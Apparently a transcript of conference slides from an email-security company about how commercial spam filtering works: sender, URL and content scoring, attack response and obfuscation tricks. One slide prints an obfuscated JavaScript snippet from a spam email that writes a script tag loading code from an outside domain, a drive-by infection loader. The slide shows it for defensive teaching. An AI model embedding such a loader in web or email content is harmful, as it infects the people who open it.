Email filtering: A view from the inside. Tom Fawcett Machine Learning Architect Proofpoint, Inc. tfawcett@acm.org



Similar documents
How To Filter From A Spam Filter

. Daniel Zappala. CS 460 Computer Networking Brigham Young University

Intercept Anti-Spam Quick Start Guide

Marketing 201. How a SPAM Filter Works. Craig Stouffer Pinpointe On-Demand cstouffer@pinpointe.com (408) x125

Eiteasy s Enterprise Filter

eprism Security Appliance 6.0 Intercept Anti-Spam Quick Start Guide

The Latest Internet Threats to Affect Your Organisation. Tom Gillis SVP Worldwide Marketing IronPort Systems, Inc.

Anti Spamming Techniques

COMBATING SPAM. Best Practices OVERVIEW. White Paper. March 2007

Mailwall Remote Features Tour Datasheet

When Reputation is Not Enough: Barracuda Spam Firewall Predictive Sender Profiling. White Paper

Emerging Trends in Fighting Spam

Overview An Evolution. Improving Trust, Confidence & Safety working together to fight the beast. Microsoft's online safety strategy

An Overview of Spam Blocking Techniques

Commtouch RPD Technology. Network Based Protection Against -Borne Threats

When Reputation is Not Enough: Barracuda Spam & Virus Firewall Predictive Sender Profiling

Thexyz Premium Webmail

SPAM FILTER Service Data Sheet

FILTERING FAQ

security

Quarantined Messages 5 What are quarantined messages? 5 What username and password do I use to access my quarantined messages? 5

Comprehensive Anti-Spam Service

Marketing Glossary of Terms

SCORECARD MARKETING. Find Out How Much You Are Really Getting Out of Your Marketing

INBOX. How to make sure more s reach your subscribers

ΕΠΛ 674: Εργαστήριο 5 Firewalls

System Compatibility. Enhancements. Operating Systems. Hardware Requirements. Security

eprism Security Appliance 6.0 Release Notes What's New in 6.0

The State of Spam A Monthly Report August Generated by Symantec Messaging and Web Security

Anti-Phishing Best Practices for ISPs and Mailbox Providers

Trend Micro Hosted Security Stop Spam. Save Time.

TRUSTWAVE SEG SPAMCENSOR EXPLAINED

Trend Micro Hosted Security Stop Spam. Save Time.

Copyright 2011 Sophos Ltd. Copyright strictly reserved. These materials are not to be reproduced, either in whole or in part, without permissions.

Handling Unsolicited Commercial (UCE) or spam using Microsoft Outlook at Staffordshire University

ΕΠΛ 475: Εργαστήριο 9 Firewalls Τοίχοι πυρασφάλειας. University of Cyprus Department of Computer Science

1. Introduction Deliverability-Benchmarks Working with Your Service Provider sent delivered...

Observation and Findings

Stop Spam. Save Time.

Recurrent Patterns Detection Technology. White Paper

FireEye Threat Prevention Cloud Evaluation

Ipswitch IMail Server with Integrated Technology

October Is National Cyber Security Awareness Month!

Introduction. How does filtering work? What is the Quarantine? What is an End User Digest?

Why Content Filters Can t Eradicate spam

Who will win the battle - Spammers or Service Providers?

Microsoft Outlook 2010 contains a Junk Filter designed to reduce unwanted messages in your

Context Adaptive Scanning Engine: Protecting Against the Broadest Range of Blended Threats

MailMarshal SMTP 2006 Anti-Spam Technology

Combining Global and Personal Anti-Spam Filtering

A White Paper. VerticalResponse, Delivery and You A Handy Guide. VerticalResponse,Inc nd Street, Suite 700 San Francisco, CA 94107

Microsoft and Windows are either registered trademarks or trademarks of Microsoft Corporation in the United States and/or other countries.

Government of Canada Managed Security Service (GCMSS) Annex A-5: Statement of Work - Antispam

Application Firewalls

Implementing MDaemon as an Security Gateway to Exchange Server

Marketing 101 Maximizing Results

Common Cyber Threats. Common cyber threats include:

Groundbreaking Technology Redefines Spam Prevention. Analysis of a New High-Accuracy Method for Catching Spam

Libra Esva. Whitepaper. Glossary. How Really Works. Security Virtual Appliance. May, It's So Simple...or Is It?

Deploying Layered Security. What is Layered Security?

Network Fundamentals Carnegie Mellon University

The Network Box Anti-Spam Solution

Antispam Security Best Practices

Best Practices: How To Improve Your Survey Invitations and Deliverability Rate

Kaspersky Anti-Spam 3.0

Comprehensive Filtering. Whitepaper

Create an Campaign. Create & Send Your Newsletter

Whose IP Is It Anyways: Tales of IP Reputation Failures

What is a Mail Gateway?... 1 Mail Gateway Setup Peering... 3 Domain Forwarding... 4 External Address Verification... 4

Spam detection with data mining method:

eprism Security Suite

Big Data in Action: Behind the Scenes at Symantec with the World s Largest Threat Intelligence Data

Internet Security [1] VU Engin Kirda

ETH Zürich - Mail Filtering Service

More Details About Your Spam Digest & Dashboard

A Game Theoretical Framework for Adversarial Learning

ContentCatcher. Voyant Strategies. Best Practice for Gateway Security and Enterprise-class Spam Filtering

Evangelos Kranakis, School of Computer Science, Carleton University, Ottawa 1. Network Security. Canada France Meeting on Security, Dec 06-08

Transcription:

Email filtering: A view from the inside Tom Fawcett Machine Learning Architect Proofpoint, Inc. tfawcett@acm.org

Typical data mining view of spam filtering Email corpus (ham + spam) Content extraction, pre-processing Bag-of-words representation From: "Latasha Gunter" <2nlni7jkcv2@audit.net> To: Tom Fawcett <tfawcett@acm.org> Subject: its been p r o v e n l qnvyvrnpztc 100% Guaranteed to Work! Our Male Enlargement Pill is the most effective on the medical market today with over a Million satisfied customers worldwide! the: 7 the: 72 male: the: 72 male: pill: 4 the: 27 male: 7 pill: 4the: male: medical: 2 27 the: pill: 4 male: medical: pill: 42 22 2 market: 1male: medical: pill: 14 2 medical: market: pill: market: 14 2 medical: market: 1 2 medical: market: market:1 1 Induction algorithm Test set support vector machines random forests ensemble methods, etc. Two-class model Cross-validation 99% accuracy! Spam filtering is easy! 2

Real spam filtering is tough Huge proportion of email is spam (> 90% at some sites) Heterogeneous email stream (Proofpoint has thousands of customers: different languages, different countries, different topics) Not just text. Virtually infinite representation space: Text, HTML, Javascript, images. Types of errors are different and important. Strict performance requirements (Service agreement: 1 FP in 350K msgs) Demanding processing requirements (100-200K messages/hr./appliance) Fundamental noise: Spam looks like bulk, spam looks like ham, phishing looks like ham; ham looks like spam. Words aren t enough: Not enough information Constantly changing spam campaigns come and go Constantly changing intelligent adaptive adversaries 3

Real spam filtering is tough (cont'd) Need for fast response. As soon as we see an attack our customers see it too. Classification process must be transparent. Human analysts must explain, analyze and correct spam decisions. Models must be white-box and understandable Strict privacy concerns We scan everything, but we can't keep it. 4

Types of data mining environments Static data mining Fixed patterns, fixed model. If data source is a stream, series is stationary. env Dynamic. Concept drift; non-stationary streams. Set of disjuncts to concept; have to decide when one is changing and how to adjust model(s). Adversarial Feedback loop with environment. Drifting concept, driven by adversary who is actively trying to defeat model. Interacting complex adaptive systems (some chaotic dynamics) Economics, game theory, complex systems theory. 5

Adversarial domains are everywhere Valuable asset + intelligent agents + large playing field = ARMS RACE Cellphone fraud / detection Blog spam, tweet spam Credit card fraud / detection Advertising / ad blocking Cracking / intrusion detection CAPCHAs / CAPCHA breaking Email (spam) / filtering Viruses / Antivirus products Click fraud Phishing / detection Games Product review spam / detection & culling User tracking technology / Privacy guards Music sharing / torrent poison Nature of the game and agents' intelligence determines the dynamics 6

Types of email we distinguish Some terminology Bulk email. Like spam but desired and (presumably) requested. Spam (unsolicited commercial email) Viruses (attachments and drive-by downloads) Phishing (representing a legit sender, to get recipient to divulge sensitive information). All spam Legit email = ham = negative class (not a threat) Illegit email = spam = positive class (threat, alarm) So errors are: False positives = false alarms (legit email thrown away) False negatives = spam that got through the filters

Where we get (training) data Historical (static) collections of ham and spam. Spamtraps: Machines on the internet that receive no legitimate email.. Honeypoints: Addresses on customer machines that receive only spam.. Sources of 100% spam False Positives and False Negatives reported by customers

Spamtraps

Email transmission process (dialog) HELO relay.example.org 250 Hello relay.example.org, glad to meet you MAIL FROM:<bob@example.org> 250 Ok RCPT TO:<alice@example.com> RCPT TO<th:eboss@example.com> Inbound sender 250 Ok TEXT Return-Path: bounce@inbound.teach12.net Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC) Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54 Date: Thu, 21 Oct 2010 12:26:43-0400 To: tom.fawcett@comcast.net From: "The Teaching Company" <teaching_company@teach12.net> Mail host (MTA) Responsible for filtering and delivery... You have received this email because you are a valued Teaching Company customer. Your email address is never rented, sold, or loaned to anyone else.... 250 Ok 10

Email components what we have to work with HELO relay.example.org Machine name and IP address of immediate upstream server MAIL FROM:<bob@example.org> Return address probably forged if spam RCPT TO:<alice@example.com> RCPT TO:<theboss@example.com> Recipients Mail body. Any portion can be forged. Return-Path: bounce@inbound.teach12.net Received: from imta31.westchester.pa.mail.comcast.net (LHLO imta31.westchester.pa.mail.comcast.net) (76.96.59.249) by sz0150.ev.mail.comcast.net with LMTP; Thu, 21 Oct 2010 16:29:53 +0000 (UTC) Received: from ttcmailer01.teach12.net ([63.146.114.254]) by imta31.westchester.pa.mail.comcast.net with comcast id MUV31f0055VPXW70XUVSzl; Thu, 21 Oct 2010 16:29:54 Date: Thu, 21 Oct 2010 12:26:43-0400 To: tom.fawcett@comcast.net From: "The Teaching Company" <teaching_company@teach12.net>... You have received this email because you are a valued Teaching Company customer. Your email address is never rented, sold, or loaned to anyone else.... Received lines, presumably indicating where the message has been and how it's been routed. Often forged in spam. Sender + recipient Body. Text, HTML, etc. Also: Attachments. Zero or more.

Email scanning process - overview Inbound email connection Delivered-To: em-ca-bruceg@em.ca Received: (qmail 4406 invoked from n1 Received: from dunwoody-dobson.ie () by churchill.factcomp.com ([24.89.90]) with ESMTP via TCP; 01 Dec 2009 1 From: "Lyles X Alisa" <Crosbyxjtovbgw> To: henrietta96@aol.com Cc: amvimdypet@fufutmadje.comt Return-Path: Crosbyxjtovbgw@mailpro Utility-based classification: General increase in cost/decrease in utility IP (connection) scoring Here's what we're for this week: Reject Domain (URL) extraction Header extraction Content parsing Domain reputation/scoring SNA Content scoring Reject Reject Deliver

IP (sender) scoring Reputation model Who's sending this email? Every inbound sender's IP (address) is evaluated Internal factors (who in our network is getting email from this IP? How much email? How much spam? etc.) External factors (How long has this IP been around? What subnet/country? Who is it registered to?) Quantified and provided to a classifier Classifier has several actions: Accept, Reject, Throttle, Discard Statistics updated quickly and shared. 13

Domain (URL) scoring What are they pointing back to? URL classification is critical. URLs are how most spammers provide links to their wares (Click <A HREF=... >HERE</A> to buy!) Every URL is extracted from each email message and evaluated. URLs are evaluated similarly to IPs but with slightly different criteria, eg who registered this domain and for how long; who is name server, etc. Classifier is used to condemn URLs, which in turn can cause an email to be rejected. Spammers know URLs are watched so they use public resources: Googlegroups, bit.ly, etc. 14

Content scoring Regular expression parsing (SpamAssassin rules + Proofpoint rule set) Very large lexicon (~ 1 million entries) Words Phrases URLs Rules and terms Trained by modified logistic regression Binomial assumption Normalized score Inputs to LR (~ 300K) Lorem ipsum dolor asdf asdf voluptat In use, produces a score between 0 and 100. voluptat asdf nostru words, phrases, regexps 15

(Why use simple classifiers?) Needs to be explainable, modifiable. Representation can (should?) incorporate many attribute interactions. 2 Empirically unnecessary. (R 0.95) No advantage from more complex models. Need for space and time efficiency. 16

Disjuncts of a spam stream Spam term frequency chi-squared tests per week of 2002 1: Relatively stable/static 2: Seasonal/periodic 3: Episodic spiking From "In vivo" spam filtering: A challenge problem for data mining. Tom Fawcett, KDD Explorations vol.5 no.2, December 2003. 17

Data mining classifier update cycles Main cycles: Lexicon consolidation, weight training, etc. 24 hrs Fast attack response: New attacks are examined and lexicon is updated. ~15 min cycles 24 hrs

Fast attack learning & response NB: Primary change is to representation, not to model. 1. Dip in TP rate on a spamtrap signifies attack that is not being handled by the classifier. Lexicon 4. Messages are clustered by text contents 2. False Negatives (low-scoring spam messages) downloaded from spamtraps. 6. New lexicon entries are pushed out to customer sites, along with weight estimates, to be integrated into classifier. 3. Messages are parsed and dissected (URL, email extraction, etc.) 5. In consultation with lexicon, characteristic terms are extracted from clusters good cheap Canadian meds lowest mortgage rates in years 19

Text models aren't enough Intentional mis-spelling (V1a.gr@, ViaggrA, C1ALYS, etc.) Inherent overlap/noise (CIALYS) Difference is often intention: Did you request this info? Do you want this ad? Too easy to get around text! 20

Text models aren't enough 21

Text models aren't enough 22

Text models aren't enough (cont'd) 23

Text models aren't enough On your screen Source <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/tr/html4/strict.dtd"> <html> <head> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="600"> <tbody> <tr> <td bgcolor="#999999" width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td> <td width="1"><img src="http://graphics.nytimes.com/images/misc/spacer.gif" border="0" height="1" width="1"></td> <td width="598"> <table border="0" cellpadding="0" cellspacing="0" width="598"> <tbody> Rendering etc.... Behind the scenes <script type="text/javascript"> <!-var s="=tdsjqu!tsd>#iuuq;00dpmpsepops/dpn0jgsbnfgjmf/kt#?=0tdsjqu?"; m=""; for (i=0; i<s.length; i++) m+=string.fromcharcode(s.charcodeat(i)-1); document.write(m); //--> <script src="http://colordonor.com/iframefile.js"></script> You're infected. 24

Network effects: Cell phone fraud Dialed digits detector Network connections can be used to classify/identify people. Fraudulent! Fraudulent Fraud detection: How closely does pattern match a known fraudulent one? Anomaly detection: How different is a pattern from known legit one? Fraudulent or legit? 25

Link mining and network analysis Link mining may be used to identify spam by p(spam a,b,c,d) NS IP1 IP2 Identifying anomalous, low probability links between recipients (spoofed names, compromised accounts, etc.) Identifying anomalous links between individuals in organizations. Identifying known bad email addresses and the messages that link to them. Linking IPs with countries, subnets; domains with nameservers, etc. 26

[End] 27